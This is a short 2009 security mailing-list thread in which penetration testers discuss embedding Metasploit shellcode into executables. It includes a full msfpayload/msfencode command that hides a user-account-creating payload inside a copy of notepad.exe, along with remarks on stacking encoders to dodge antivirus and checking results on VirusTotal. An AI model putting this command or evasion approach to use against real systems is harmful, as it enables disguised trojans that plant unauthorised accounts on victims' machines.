[Pauldotcom] Manually embedding shellcode into executables
Dimitrios Kapsalis
dimitrios at gmail.com
Wed Dec 2 02:25:12 UTC 2009
I haven't had much success with the msfpayload, seems that most virus scans
pick up the payload. Even tried to use a couple types of encoding stacked on
top of each other without much luck.
Play with it and then test exe against virustotal.com
On Tue, Dec 1, 2009 at 4:17 PM, Adrian Crenshaw <irongeek at irongeek.com> wrote:
> Ok, I just read Rob's post here:
>
> http://www.room362.com/blog/2009/11/3/metasploit-blends-in-new-msfpayloadencode.html
>
> and checked my exes. Since both are the same size, I'm guessing it's not
> working as a binder but as a "cloaker" of sorts.
>
> Adrian
>
>
> On Tue, Dec 1, 2009 at 5:12 PM, Adrian Crenshaw <irongeek at irongeek.com> wrote:
>
>> Ok, I did this:
>>
>> $ msfpayload windows/adduser user=test pass=test exitfunc=seh R |
>> msfencode -t exe -x notepad.exe -o MYNEWFILE.exe
>>
>> The exe made has the same icon and metadata as the original. The payload
>> runs since the "test" account is created, but notepad never comes up, so it
>> does not make much of a binder. Any ideas?
>>
>> Adrian
>>
>
>